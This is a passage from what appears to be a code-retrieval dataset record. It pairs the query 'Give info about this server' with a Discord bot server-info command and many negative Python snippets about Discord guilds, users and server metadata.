\"\"\"\n current_tag = 0\n for word in tag:\n if tag[current_tag].lower() == 'this':\n break\n if tag[current_tag].istitle():\n author.append(tag[current_tag].decode(encoding='UTF8',\n errors='ignore'))\n current_tag += 1\n\n return author", "async def devox(self, ctx):\n member = discord.utils.find(lambda m: m.id == 250865328194715658, ctx.channel.guild.members)\n await ctx.send(\"{} The great man who created this bot some people say he has too much power, but the truth is he doesnt have enough\".format(member.mention))", "async def follow(follow):\n await follow.edit(\n f\"`FOLLOW {DEFAULTUSER} ON` \\n\\n\"\n f\"[InstaGram](https://www.instagram.com/mayur_karaniya) \\n\\n\"\n f\"[FaceBook](https://www.facebook.com/mkaraniya) \\n\\n\"\n f\"[YouTube](https://www.youtube.com/channel/UCeKQxQK7XZ3jGi3541uWATg?sub_confirmation=1) \"\n )", "def __add_author(self, key_name, others_names, personal_information):\n for name in others_names:\n self.author_to_authorID[name] = (key_name, personal_information)", "def is_judges_or_author(line_text):\n # line can't be too long\n if len(line_text) > 80:\n return False\n\n line_lower = line_text.lower()\n\n # 'Before DYKMAN, VERGERONT and LUNDSTEN, JJ.'\n # 'Present: All the Justices.'\n if any(line_lower.startswith(s) for s in (\"before\", \"present\", \"considered and decided by\")) or 'en banc' in line_lower:\n return \"judges\"\n\n # 'PER CURIAM.'\n if any(s in line_lower for s in ('per curiam', 'opinion by', 'by the court')):\n return \"author\"\n\n if any(s in line_lower for s in judge_titles):\n if \" and \" in line_text or \" & \" in line_text:\n return \"judges\"\n else:\n return \"author\"\n\n return None", "def extra_bibparse(db):\n for key,entry in db.entries.items():\n for auth in entry.persons[\"author\"]:\n if (\"Harrison\" not in auth.first_names or\n \"Chapman\" not in auth.last_names):\n entry.add_person(auth, \"otherauthor\")", "def getName(sentence): #Jasper, Suraj\n userWords = sentence.lower()\n userWords = userWords.split()\n \n # ways of introduction:\n # \"Hello, my name is ___\"\n # \"Hi, I'm ____\"\n # \"Howdy, I'm called ____\"\n # Order: Greeting -> pronoun -> Name -> question (optional)\n # eg. \"Hello, I'm Jasper. How are you?\"\n\n if (userWords[0] in greetings): #the added code that stops iam from being added into the name if 2 greeting are added\n userWords.pop(0) #pop and not .remove because\n \n \n if (userWords[0] == \"i\" and len(userWords) > 1):\n if (userWords[1] in [\"m\",\"am\"]):\n userWords.insert(0, \" \".join(userWords[0:2]))\n userWords.pop(2)\n userWords.pop(1)\n \n userName = \"\"\n for userWord in userWords: #iterate throught the user's words\n foundWord = False #sets True when there's a similar word in the other list\n for word in greetings: #iterates and compares the chosen word from the user's list of words to the words list\n if userWord == word and foundWord == False:\n foundWord = True\n if foundWord == False:\n userName = userName + userWord + \" \"\n return userName #this is the found name", "def is_mention(self, bot):\n for um in self.original.entities['user_mentions']:\n if um['screen_name'] == bot.screen_name:\n return True\n return False", "def on_whoisuser(self, raw_msg, nick, user, host, **kwargs):", "def test_super_short_author_name(self):\n spi_search = \"fin a er and cn cms\"\n inv_search = \"author:er collaboration:cms\"\n self._compare_searches(inv_search, spi_search)", "def entity_mentions(adm):\n for entity in adm['attributes']['entities']['items']:\n for mention in entity['mentions']:\n # Augment mentions with the entity type of the entity they refer to\n mention['type'] = entity.get('type')\n yield mention", "def show_user(title, fname, lname):\n person = \"{} {} {}\".format(title, fname, lname)\n logger.info(\"{}\".format(person))\n return person", "async def treatme(self, ctx):\n await ctx.send(await self.cure_user(ctx, ctx.author))", "def test_author_full_initial(self):\n inv_search = 'author:\"klebanov, ig* r*\" or exactauthor:\"klebanov, i r\"'\n spi_search = \"find a klebanov, ig.r.\"\n self._compare_searches(inv_search, spi_search)" ]
[ "0.6522878", "0.6522878", "0.5954495", "0.5830652", "0.58269155", "0.5811767", "0.5793768", "0.5775662", "0.5751016", "0.5696697", "0.5679133", "0.55970377", "0.55823743", "0.556282", "0.5555041", "0.55549055", "0.5526657", "0.5525049", "0.55118614", "0.5511843", "0.5495225", "0.54822", "0.54801834", "0.54798365", "0.5477462", "0.5470072", "0.54672986", "0.5444114", "0.54390556", "0.54197454", "0.5412081", "0.5409958", "0.54058385", "0.53903574", "0.53784794", "0.53738165", "0.5357082", "0.53565294", "0.5342198", "0.53417104", "0.5338186", "0.5332554", "0.53312904", "0.5323259", "0.5323022", "0.5316893", "0.5316893", "0.5316893", "0.5316893", "0.5316893", "0.5309676", "0.530525", "0.5283775", "0.52744484", "0.5273108", "0.52709967", "0.52532136", "0.5252192", "0.5251863", "0.52419126", "0.52391523", "0.5238473", "0.523477", "0.5230162", "0.5225416", "0.5219187", "0.52038586", "0.51963174", "0.5190695", "0.5190605", "0.51889414", "0.5179796", "0.5179796", "0.5174712", "0.5170297", "0.5169988", "0.5156333", "0.5153297", "0.51532114", "0.51485777", "0.51446694", "0.5139777", "0.5128867", "0.512589", "0.5122284", "0.51210326", "0.51205784", "0.51199114", "0.51136684", "0.51109666", "0.5108836", "0.5104004", "0.5098577", "0.50908923", "0.5090302", "0.50813615", "0.5070207", "0.5067306", "0.5060124", "0.50574946" ]
0.5873194
3
Give info about this server
async def serverinfo(self,ctx): g = ctx.guild embed = discord.Embed() embed.set_thumbnail(url = g.icon_url) embed.title = "{} - {}".format(g.name,g.id) embed.add_field(name = "Owner",value="{} - {}".format(g.owner,g.owner.id),inline=False) embed.add_field(name = "Created at", value = str(g.created_at), inline=False) embed.add_field(name = "Total Roles", value= str(len(g.roles)), inline=False) embed.add_field(name = "Total Members", value= str(g.member_count), inline=False) embed.add_field(name = "Premium Member", value= str(g.premium_subscription_count), inline=False) embed.add_field(name = "Premium Tier", value= str(g.premium_tier), inline=False) await self.bot.say(ctx,embed = embed)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def do_serverinfo(self, server):\n print('QManager server:', self._server)\n server_info = self._qm.get_server_info()\n for k, v in server_info.items():\n print(' %s: %s' % (k, v))", "def server_info(ctx):\n data = ctx.obj.get_server_info()\n output_json_data(data)", "def serverInfo(self):\n return self._server.getServerInfo(self._token)", "async def serverInfo(self, ctx):\n\t\ts = ctx.message.server\n\t\te = discord.Embed()\n\t\t\n\t\te.title = \"Server Statistics\"\n\t\te.description = \"\"\"\nName: {n}\nNumber of Roles: {r}\nServer Region: {sr}\nNumber of Emojis: {em}\nNumber of Members: {m}\nID: {i}\nOwner: {o}\nCreated at: {c}\n\t\t\t\t\t\t\"\"\".format(n = s.name, r = len(s.roles), sr = s.region, em = len(s.emojis), \n\t\t\t\t\t\t\t\t\tm = s.member_count, i = s.id, o = s.owner.name, c = s.created_at)\n\t\te.set_thumbnail(url = s.icon_url)\n\t\t\n\t\tawait self.bot.say(embed = e)", "async def serverinfo_command(self, ctx):\n owner = str(ctx.guild.owner.mention)\n id = str(ctx.guild.id)\n region = str(ctx.guild.region)\n memberCount = str(ctx.guild.member_count)\n textChannels = len(ctx.guild.text_channels)\n voiceChannels = len(ctx.guild.voice_channels)\n roles = len(ctx.guild.roles)\n guildCreatedate = ctx.guild.created_at.strftime(\"%a, %#d %B %Y, %I:%M %p\")\n\n embed = Embed(\n title=f\"Info of {ctx.guild.name} Server\",\n color=Color.blurple(),\n timestamp=datetime.utcnow(),\n )\n embed.set_footer(text=f\"Requested by {ctx.author.name}\")\n embed.set_thumbnail(url=ctx.guild.icon_url)\n fields = [\n (\"Server ID\", id, True),\n (\"Server Region\", region.capitalize(), True),\n (\"Owner\", owner, True),\n (\"Member Count\", memberCount, True),\n (\"Text Channels\", textChannels, True),\n (\"Voice Channels\", voiceChannels, True),\n (\"Role Count\", roles, True),\n (\"Created on\", guildCreatedate, True),\n ]\n for name, value, inline in fields:\n embed.add_field(name=name, value=value, inline=inline)\n await ctx.send(embed=embed)", "async def server_info(self, ctx):\n guild = ctx.guild\n id = guild.id\n boost_count = guild.premium_subscription_count\n region = str(guild.region)\n channels = len(guild.channels)\n vc = len(guild.voice_channels)\n text_channels = len(guild.text_channels)\n emoji_limit = guild.emoji_limit\n bitrate = guild.bitrate_limit\n filesize = guild.filesize_limit\n members = str(len(guild.members))\n owner = guild.owner.name\n icon = guild.icon_url\n roles = len(guild.roles)\n banned = len(await guild.bans())\n invites = len(await guild.invites())\n created = str(guild.created_at)\n embed = discord.Embed(\n title=guild.name,\n description=\"Server Info:\",\n color=discord.Colour.purple()\n )\n embed.set_thumbnail(url=icon)\n embed.add_field(name=\"ID:\", value=str(id))\n embed.add_field(name=\"Owner: \", value=owner)\n embed.add_field(name=\"Region: \", value=region)\n embed.add_field(name=\"created at: \", value=created)\n embed.add_field(name=\"Boost count: \", value=boost_count)\n embed.add_field(name=\"Members: \", value=members)\n embed.add_field(name=\"Roles:\", value=str(roles))\n embed.add_field(name=\"Channels:\", value=str(channels))\n embed.add_field(name=\"Text Channels:\", value=str(text_channels))\n embed.add_field(name=\"Voice Channels:\", value=str(vc))\n embed.add_field(name=\"Emoji Limit:\", value=str(emoji_limit))\n embed.add_field(name=\"Max Bitrate:\", value=bitrate)\n embed.add_field(name=\"Max Filesize:\", value=filesize)\n embed.add_field(name=\"Banned Members:\", value=str(banned))\n embed.add_field(name=\"Active Invites:\", value=str(invites))\n await ctx.send(\"\", embed=embed)", "def get_servers_info(self):\n return self.mrr_obj.get('/info/servers')", "async def serverinfo(self, context: Context) -> None:\n roles = [role.name for role in context.guild.roles]\n if len(roles) > 50:\n roles = roles[:50]\n roles.append(f\">>>> Displaying[50/{len(roles)}] Roles\")\n roles = \", \".join(roles)\n\n embed = discord.Embed(\n title=\"**Server Name:**\", description=f\"{context.guild}\", color=0x9C84EF\n )\n if context.guild.icon is not None:\n embed.set_thumbnail(url=context.guild.icon.url)\n embed.add_field(name=\"Server ID\", value=context.guild.id)\n embed.add_field(name=\"Member Count\", value=context.guild.member_count)\n embed.add_field(\n name=\"Text/Voice Channels\", value=f\"{len(context.guild.channels)}\"\n )\n embed.add_field(name=f\"Roles ({len(context.guild.roles)})\", value=roles)\n embed.set_footer(text=f\"Created at: {context.guild.created_at}\")\n await context.send(embed=embed)", "def get_server_info(self):\n\t\treturn handle_to_object(call_sdk_function('PrlSrv_GetServerInfo', self.handle))", "def serverinfo( self, mess, args):\n version = open('/proc/version').read().strip()\n loadavg = open('/proc/loadavg').read().strip()\n\n return '%snn%s' % ( version, loadavg, )", "def serverinfo( self, mess, args):\n version = open('/proc/version').read().strip()\n loadavg = open('/proc/loadavg').read().strip()\n\n return '%s\\n\\n%s' % ( version, loadavg, )", "def get_server_info_list(self):\n # TODO: 不要では?特に理由がなければ削除する\n result = []\n if self._server_sock is not None:\n result.append(\"Sever address: %s\" %\n str(self._server_sock.getsockname()))\n else:\n result.append(\"Sever address: Not initialized yet.\")\n result.append(\"Handler: %s\" %\n str(self._data_handler.__class__))\n result.append(\"Sessions: %d\" % len(self._sessions))\n for idx, session_thread in enumerate(self._sessions):\n result.append(\"Session[%d]: %s\" % (\n idx, str(session_thread.client_address)))\n return result", "def redis_info(self):\n def func(server):\n return server.info()\n self.__run_redis_cmd(func)", "def info(self):\n self._info()", "def get_server(self):\n\n pass", "def info(self):\n return requests.get(self.info_url + self.pid).json()", "def test_server_info(self):\n pass", "def info(self):\n return self.client.call('GET', self.name + 'info')", "def get_db_info(self):\n db_info = {}\n db_info[\"Mongo Server Info\"] = self.db_client.server_info()\n return db_info", "def get_server_info(self):\n raise NotImplementedError('Database.get_version()')", "def get_info(self):\n pass", "def get_info(self):\n pass", "def info(self) -> dict:", "def info() -> None:", "def info(self):\r\n return self._get('info', {})", "def details(self):\n return self.sock.getsockname()", "def getInfo():", "async def server_info(self, ctx):\n if ctx.author.bot == False:\n embed = discord.Embed(title= ctx.guild.name,\n colour= ctx.guild.owner.colour\n )\n\n embed.set_thumbnail(url=ctx.guild.icon_url)\n\n statuses = [len(list(filter(lambda m: str(m.status) == \"online\", ctx.guild.members))),\n len(list(filter(lambda m: str(m.status) == \"idle\", ctx.guild.members))),\n len(list(filter(lambda m: str(m.status) == \"dnd\", ctx.guild.members))),\n len(list(filter(lambda m: str(m.status) == \"offline\", ctx.guild.members)))]\n\n fields =[\n (\"Owner\", f'{ctx.guild.owner.mention}', True),\n (\"Region\", f'{str(ctx.guild.region).title()}', True),\n (\"Created on\", ctx.guild.created_at.strftime(\"%b %d, %Y \"), True),\n \n (\"Members\", f\"{len(list(filter(lambda m: not m.bot, ctx.guild.members)))} | {len(list(filter(lambda m: m.bot, ctx.guild.members)))}\", True),\n (\"Roles\", len(ctx.guild.roles), True),\n (\"Banned\", len(await ctx.guild.bans()), True),\n\n (\"Emojis\", len(ctx.guild.emojis), True),\n (\"Text channels\", len(ctx.guild.text_channels), True),\n (\"Voice channels\", len(ctx.guild.voice_channels), True),\n \n\n (\"\\u200b\",f\"**🟢 {statuses[0]}|🟠 {statuses[1]}|🔴 {statuses[2]}|⚪ {statuses[3]}**\", False)\n ]\n for name, value, inline in fields:\n embed.add_field(name=name, value=value, inline=inline)\n await ctx.send(embed=embed)", "def getHostInfo():", "def rpc_info():", "def info(self):", "def info(self):", "def info(client):\n\n return client.get_info()", "def __repr__(self):\n return \"API Server Running at: \" + str(self.host) + \" on Port:\" + str(self.port) \\\n + \"/records: Return records\\n\" + \"/response_time: Return All response_times\\n\" \\\n + \"/response_time/max: Return max response_times\\n\" \\\n + \"/response_time/min: Return min response_times\\n\" \\\n + \"/response_time/average: Return average response_times\\n\" \\\n + \"/response_time/all_stats: Return tuple of(min, max, average) response_times\\n\"", "def info(self):\n resp = requests.get(\"%s/api/info\"%self.urlbase, verify=False)\n return resp.json", "def info(self):\n return {}", "def server(self):\n return self.the_server", "def info(self, *path):\n self._download_server_info()\n if self._info:\n return self._info.get(path, {})\n path = list(path)\n path[-1] += \".info\"\n t = self._open(*path)\n if t.status_code == 200:\n return json.loads(t.text)\n else:\n return {}", "def info(self):\n pp = pprint.PrettyPrinter(indent=4)\n print_text_box('Info')\n pp.pprint(self.manager.data[\"info\"])\n print('')", "def info(self) -> str:\n return pulumi.get(self, \"info\")", "async def info(self, ctx):\n self.logger.info(misolog.format_log(ctx, f\"\"))\n appinfo = await self.client.application_info()\n membercount = sum(1 for x in self.client.get_all_members())\n info_embed = discord.Embed(title=f\"Miso Bot | version {main.version}\",\n description=f\"Created by {appinfo.owner.mention}\\n\\n\"\n f\"Use `{self.client.command_prefix}help` to get the list of commands, \"\n f\"or visit the documention website for more help.\"\n f\"\\n\\nCurrently active in **{len(self.client.guilds)}** \"\n f\"servers totaling **{membercount}** unique users\",\n colour=discord.Colour.red())\n\n # info_embed.set_footer(text=f'version 2.0')\n info_embed.set_thumbnail(url=self.client.user.avatar_url)\n info_embed.add_field(name='Github', value='https://github.com/joinemm/miso-bot', inline=False)\n info_embed.add_field(name='Documentation', value=\"http://joinemm.me/misobot\", inline=False)\n info_embed.add_field(name='Patreon', value=\"https://www.patreon.com/joinemm\", inline=False)\n await ctx.send(embed=info_embed)", "def get_info(self) -> str:\n return self.info", "def get(self):\n try:\n server_response = self.get_unauthenticated_request(self.baseurl)\n except ServerResponseError as e:\n if e.code == \"404003\":\n raise ServerInfoEndpointNotFoundError(e)\n if e.code == \"404001\":\n raise EndpointUnavailableError(e)\n raise e\n\n self._info = ServerInfoItem.from_response(server_response.content, self.parent_srv.namespace)\n return self._info", "async def serverinfo(self, ctx):\n guild = ctx.guild\n\n embed = discord.Embed()\n embed.title = str(guild)\n if guild.icon_url is not None:\n embed.description = '**ID**: {0.id}\\n[Icon URL]({0.icon_url})'.format(guild)\n embed.set_thumbnail(url=guild.icon_url)\n else:\n embed.description = '**ID**: {0.id}'.format(guild)\n\n if guild.me.permissions_in(ctx.channel).kick_members and ctx.author.permissions_in(ctx.channel).kick_members:\n dead_members = await ctx.guild.estimate_pruned_members(days=7)\n members = '{} members, {} of which were active in the past 7 days'.format(guild.member_count,\n guild.member_count - dead_members)\n else:\n members = guild.member_count\n\n embed.add_field(name='Members', value=members)\n\n roles = [x.mention for x in guild.role_hierarchy if not x.is_default()]\n if roles: # only show roles if the server has any\n roles = ', '.join(roles)\n if len(roles) <= 1024: # deal with limits\n embed.add_field(name='Roles', value=roles)\n\n channels = [x[1] for x in sorted([(x.position, x.mention) for x in guild.channels if\n isinstance(x, discord.TextChannel)])]\n channels = ', '.join(channels)\n if len(channels) <= 1024:\n embed.add_field(name='Text channels', value=channels)\n\n if guild.verification_level == discord.VerificationLevel.none:\n verification_level = 'None'\n elif guild.verification_level == discord.VerificationLevel.low:\n verification_level = 'Low'\n elif guild.verification_level == discord.VerificationLevel.medium:\n verification_level = 'Medium'\n elif guild.verification_level == discord.VerificationLevel.high:\n verification_level = '(╯°□°)╯︵ ┻━┻'\n else:\n verification_level = '┻━┻ ミヽ(ಠ益ಠ)ノ彡┻━┻'\n\n if guild.explicit_content_filter == discord.ContentFilter.disabled:\n explicit_level = 'Don\\'t scan any messages'\n elif guild.explicit_content_filter == discord.ContentFilter.no_role:\n explicit_level = 'Scan messages from members without a role'\n else:\n explicit_level = 'Scan messages sent by all members'\n\n info = '**AFK channel**: {0.afk_channel}\\n**AFK timeout**: {0.afk_timeout} seconds\\n' \\\n '**Owner**: {0.owner.mention}\\n**Region**: `{0.region.value}`\\n' \\\n '**Verification level**: {1}\\n**Explicit content filter**: {2}'.format(guild, verification_level,\n explicit_level)\n\n embed.add_field(name='Other miscellaneous info', value=info)\n\n embed.timestamp = guild.created_at\n embed.set_footer(text='Created on')\n\n if ctx.channel.permissions_for(ctx.guild.me).embed_links:\n if ctx.author.id == self.liara.user.id:\n await ctx.message.edit(embed=embed)\n else:\n await ctx.send(embed=embed)\n else:\n await ctx.send('Unable to post serverinfo, please allow the Embed Links permission.')", "def info(self):\n return self.__dict__[self.sid]", "def info(self):\n return self._fetch_json('/api/info')", "def info(self):\n path = self._get_path('info')\n \n response = self._GET(path)\n self._set_attrs_to_values(response)\n return response", "def get_node_details(self, node):\n node_details = self.parser.find_server_by_ip(node.get('ip')) or \\\n self.parser.find_server_by_hostname(node.get('host'))\n\n return node_details", "def SetServerInformation(self, server, port):\n self.hostname = server\n self.port = port", "def default_server_info():\n # If not set or purposely set = None, then set default\n if MDC.get('server') is None:\n try:\n server = socket.getfqdn()\n except Exception:\n try:\n server = socket.gethostname()\n except Exception:\n server = ''\n MDC.put('server', server)\n if MDC.get('serverIPAddress') is None:\n try:\n server_ip_address = socket.gethostbyname(MDC.get('server'))\n except Exception:\n server_ip_address = \"\"\n MDC.put('serverIPAddress', server_ip_address)", "def fp_meta(self):\n for server in self.machines:\n s = self.machines[server]\n print \"%s: %s (%s)\" % (s.id, s.adminPass, s)", "def getInfo(self):\n return self.info", "def sipserver_status(self) -> str:", "def get_info(self):\n return \"TODO !\"", "def info(self):\n _, data = yield from self.transport.perform_request('GET', '/')\n return data", "def _request_bootstrap_server_info() -> str:\n if __debug__:\n logger.info(\"Requesting bootstrap server...\")\n req = BootstrapServerRequest()\n DistroStreamClientHandler.request(req)\n\n # Retrieve answer\n req.wait_processed()\n error = req.get_error_code()\n if error != 0:\n raise BackendException(error, req.get_error_msg())\n\n # Parse answer\n answer = req.get_response_msg()\n if __debug__:\n logger.debug(\"Retrieved bootstrap server information: %s\", answer)\n\n return answer", "def __repr__(self):\n return 'Server %s at Node %s' % (self.id_number,\n self.node.id_number)", "def info(self) -> str:\n return self._info", "def info(self) -> str:\n return self._info", "def info(self):\n return self._info", "def get_info(self) -> str:\n raise NotImplementedError()", "def get_info(self):\n return {}", "def server_info(self, **kwargs):\n kwargs['_return_http_data_only'] = True\n if kwargs.get('callback'):\n return self.server_info_with_http_info(**kwargs)\n else:\n (data) = self.server_info_with_http_info(**kwargs)\n return data", "def show_info(self):\n print 'Querying the station for the configuration...'\n config = self.station.getConfig()\n for key in sorted(config):\n print '%s: %s' % (key, config[key])", "async def info(self):\n # [p]info\n\n await self.bot.say(strings.info.format(\n CacheAPI.get(key='dwarf_repository'),\n CacheAPI.get(key='dwarf_invite_link')))", "def info(self):\n return self._info", "def get_server():\n pass", "def save(self):\n return {\n \"type\": \"Server\",\n \"fd\": self.socket.fileno()\n }", "def get_server(self):\n return self.__server", "def info(self):\n\n if self.running:\n return INFO_RUNNING_FORMAT.format(**self.__dict__)\n else:\n return INFO_ENDED_FORMAT.format(**self.__dict__)", "def info(self) -> Info:\n raw = self._call('GET', 'info')\n return Info.parse_raw(raw)", "def get_info(self):\n return None", "def getInfo(self):\n return self._info", "def info(self) -> Optional[Dict[str, Any]]:\n return self._state.get(\"info\", None)", "def server_info(subresource, server, proxyfilename, baseurl):\n server = HTTPRequests(url=server, localcert=proxyfilename, localkey=proxyfilename, version='HC')\n\n dictresult, status, reason = server.get(baseurl, {'subresource' : subresource})\n\n return dictresult['result'][0]", "def server(self):\n return self._server", "def server(self):\n return self._server", "def get_info():\n message = \"GET information about glancesync server\"\n\n logger_api.info(message)\n\n message = '''\n {\n \"id\": \"%s\",\n \"owner\": \"%s\",\n \"status\": \"%s\",\n \"version\": \"%s\",\n \"updated\": \"%s\",\n \"runningfrom\": \"%s\",\n \"href\": \"%s\"\n }\n ''' % (ID, OWNER, STATUS, VERSION, UPDATED, RUNNINGFROM, API_INFO_URL)\n\n resp = make_response(message, httplib.OK)\n resp.headers[SERVER_HEADER] = SERVER\n resp.headers[CONTENT_TYPE] = JSON_TYPE\n\n logger_api.info('Return result: %s', message)\n\n return resp", "async def serverinfo(ctx):\n server = ctx.message.server\n online = len([m.status for m in server.members\n if m.status == discord.Status.online or\n m.status == discord.Status.idle])\n total_users = len(server.members)\n text_channels = len([x for x in server.channels\n if x.type == discord.ChannelType.text])\n voice_channels = len(server.channels) - text_channels\n passed = (ctx.message.timestamp - server.created_at).days\n created_at = (\"Since {}. That's over {} days ago!\"\n \"\".format(server.created_at.strftime(\"%d %b %Y %H:%M\"), passed))\n\n colour = ''.join([random.choice('0123456789ABCDEF') for x in range(6)])\n colour = int(colour, 16)\n embed = discord.Embed(description = created_at, colour = discord.Colour(value = colour), timestamp = datetime.datetime.utcnow())\n embed.add_field(name = \"Region\", value = str(server.region))\n embed.add_field(name = \"Users Online\", value = \"{}/{}\".format(online, total_users))\n embed.add_field(name = \"Text Channels\", value = text_channels)\n embed.add_field(name = \"Voice Channels\", value = voice_channels)\n embed.add_field(name = \"Roles\", value = len(server.roles))\n embed.add_field(name = \"Owner\", value = str(server.owner))\n embed.set_footer(text = \"Server ID: \" + server.id)\n embed.add_field(name = \"AFK Timeout\", value = \"{} minutes\".format(server.afk_timeout/60).replace(\".0\", \"\"))\n embed.add_field(name = \"AFK Channel\", value = str(server.afk_channel))\n embed.add_field(name = \"Verification Level\", value = str(server.verification_level))\n embed.set_footer(text= \"{} | Requested by: {}\".format(version, ctx.message.author))\n\n if server.icon_url:\n embed.set_author(name = server.name, url = server.icon_url)\n embed.set_thumbnail(url = server.icon_url)\n else:\n embed.set_author(name=server.name)\n\n await bot.say(embed = embed)", "def get_server_metadata(self, name):\n raise NotImplementedError", "def device_info(self):\n info = {\n \"connections\": {(CONNECTION_NETWORK_MAC, self._data[\"port-mac-address\"])},\n \"manufacturer\": self._ctrl.data[\"resource\"][\"platform\"],\n \"model\": self._ctrl.data[\"resource\"][\"board-name\"],\n \"name\": f\"{self._inst} {self._data['default-name']}\",\n }\n return info", "def device_info(self) -> dict:\n return {\n \"connections\": {(DOMAIN, self._unique_id)},\n \"name\": self._host,\n \"manufacturer\": \"IMAP E-Mail\",\n \"sw_version\": VERSION,\n }", "def get_description(self):\n return self['host_name']", "def server_type(self):\n ...", "async def info(self, ctx):\n\t\tembed = discord.Embed(\n\t\t\tdescription=\"Created By Seperoph#1399 and AkaBaka#4654\",\n\t\t\tcolor=config[\"success\"]\n\t\t)\n\t\tembed.set_author(\n\t\t\tname=\"Bot Information\"\n\t\t)\n\t\tembed.add_field(\n\t\t\tname=\"Head Programmers:\",\n\t\t\tvalue=\"Seperoph#1399 and AkaBaka#4654\",\n\t\t\tinline=True\n\t\t)\n\t\tembed.add_field(\n\t\t\tname=\"Python Version:\",\n\t\t\tvalue=f\"{platform.python_version()}\",\n\t\t\tinline=True\n\t\t)\n\t\tawait ctx.respond(embed=embed)", "def info(self):\n import string\n results = self.info_list()\n labels = \"%-8s %-9s %-4s %-8s %-8s %-4s\" % \\\n ('MACHINE','CPU','GHZ','MB TOTAL',\n 'MB FREE','LOAD')\n print labels\n for i in range(len(self.workers)):\n name = string.split(self.workers[i].host,'.')[0]\n res = results[i]\n s = \"%-8s %2dx%-6s %4.1f %8.1f %8.1f %4.2f\" % \\\n (name[-8:], res['cpu_count'],res['cpu_type'][-6:], \\\n res['cpu_speed'],res['mem_total'],res['mem_free'],\\\n res['load_1'])\n print s", "def info(self):\n self.update_info()\n print('Number of electrodes: ' + str(self.n_elecs))\n print('Recording time in seconds: ' + str(self.dur))\n print('Sample Rate in Hz: '+ str(self.sample_rate))\n print('Number of sessions: ' + str(self.n_sessions))\n print('Date created: ' + str(self.date_created))\n print('Meta data: ' + str(self.meta))", "def info() -> Dict[str, Any]:", "def describe(self) -> None:\n return {\n 'cluster_metadata': self.cluster_metadata,\n 'master_url': self.master_url\n }", "async def _info(self, ctx: Context):\n\n embed = discord.Embed(colour=await ctx.embed_colour())\n\n perm_int = discord.Permissions(268494928)\n\n data = await self.bot.application_info()\n invite_url = discord.utils.oauth_url(data.id, permissions=perm_int)\n\n embed.description = (\n \"TvM Assistant is a Discord bot with utility commands to make hosting TvMs easier.\"\n \"\\n\\nSome of the bot features include:\"\n \"\\n\\n- Setup roles and channel creation\"\n \"\\n- Management of sign-ups, sign-outs, spectators and replacements\"\n \"\\n- In-built logging to detect and ignore private channels\"\n \"\\n- Quick creation of player, mafia and spectator chats\"\n \"\\n- Vote counts and time since day/night started\"\n )\n\n links = (\n f\"\\n- [Invite to your server]({invite_url})\"\n f\"\\n- [Quickstart]({QUICKSTART})\"\n f\"\\n- [Commands Reference]({COMMANDS_REFERENCE})\"\n f\"\\n- [Source Code]({SOURCE_CODE})\"\n )\n\n embed.add_field(name=\"\\u200b\\nQuick Links\", value=links)\n embed.set_author(name=f\"About {ctx.me.name}\", icon_url=ctx.me.avatar_url)\n\n await ctx.send(embed=embed)", "def show_hostname(self):\n if self.hostname is None:\n self.get_version()\n print self.hostname", "def server_name(self) -> str:\n return pulumi.get(self, \"server_name\")", "def manage_info():", "def info(self):\n return self.info_text", "def get_host_stats(self):\n status, data, errors, messages = self._make_get_request(CraftyAPIRoutes.SERVER_STATS)\n \n if status == 200:\n return data\n elif status == 500:\n self._check_errors(errors, messages)", "def server():", "def server():", "async def _serverinfo(self, ctx, details: bool = True):\n # if not id:\n # guild = ctx.guild\n # else:\n # try:\n # guild = ctx.bot.get_guild(int(id))\n # if not guild:\n # guild = await ctx.bot.fetch_guild(int(id))\n # except Exception as e:\n # await ctx.send(f\"Error: {e}\")\n\n guild = ctx.guild\n online = len([m.status for m in guild.members if m.status != discord.Status.offline])\n if not details:\n desc = \"Created at {date}\".format(date=guild.created_at.strftime(\"%d %b %Y %H:%M\"))\n data = discord.Embed(color=ctx.guild.me.top_role.color, description=desc)\n data.set_author(name=guild.name)\n data.set_thumbnail(url=guild.icon_url)\n data.add_field(name=\"Region\", value=bold(guild.region))\n data.add_field(name=\"Users Online\", value=bold(f\"{online}/{guild.member_count}\"))\n data.add_field(name=\"Roles\", value=bold(len(guild.roles)))\n data.add_field(name=\"Owner\", value=bold(str(guild.owner)))\n data.set_footer(text=f\"ID: {guild.id}\")\n\n else:\n passed = (ctx.message.created_at - guild.created_at).days\n created_at = (\"Created on {date}. That's **{num}** days ago!\").format(\n date=guild.created_at.strftime(\"%d %b %Y %H:%M\"), num=passed,\n )\n total_users = guild.member_count\n text_channels = len(guild.text_channels)\n voice_channels = len(guild.voice_channels)\n\n def _size(num: int):\n for unit in [\"B\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\"]:\n if abs(num) < 1024.0:\n return \"{0:.1f}{1}\".format(num, unit)\n num /= 1024.0\n return \"{0:.1f}{1}\".format(num, \"YB\")\n\n def _bitsize(num: int):\n for unit in [\"B\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\"]:\n if abs(num) < 1000.0:\n return \"{0:.1f}{1}\".format(num, unit)\n num /= 1000.0\n return \"{0:.1f}{1}\".format(num, \"YB\")\n\n shard_info = (\n \"\\nShard ID: **{shard_id}/{shard_count}**\".format(\n shard_id=guild.shard_id + 1,\n shard_count=ctx.bot.shard_count,\n )\n if ctx.bot.shard_count > 1\n else \"\"\n )\n online_stats = {\n \"Humans: \": lambda x: not x.bot,\n \" • Bots: \": lambda x: x.bot,\n \"\\N{LARGE GREEN CIRCLE}\": lambda x: x.status is discord.Status.online,\n \"\\N{LARGE ORANGE CIRCLE}\": lambda x: x.status is discord.Status.idle,\n \"\\N{LARGE RED CIRCLE}\": lambda x: x.status is discord.Status.do_not_disturb,\n \"\\N{MEDIUM WHITE CIRCLE}\": lambda x: x.status is discord.Status.offline,\n \"\\N{LARGE PURPLE CIRCLE}\": lambda x: any(\n a.type is discord.ActivityType.streaming for a in x.activities\n ),\n \"\\N{MOBILE PHONE}\": lambda x: x.is_on_mobile(),\n }\n member_msg = (\"Users online: **{onlineusr}/{total_users}**\\n\").format(\n onlineusr=online, total_users=total_users\n )\n count = 1\n for emoji, value in online_stats.items():\n try:\n num = len([m for m in guild.members if value(m)])\n except Exception as error:\n print(error)\n continue\n else:\n member_msg += f\"{emoji} {bold(num)} \" + (\n \"\\n\" if count % 2 == 0 else \"\"\n )\n count += 1\n\n vc_regions = {\n \"vip-us-east\": \"__VIP__ US East \" + \"\\U0001F1FA\\U0001F1F8\",\n \"vip-us-west\": \"__VIP__ US West \" + \"\\U0001F1FA\\U0001F1F8\",\n 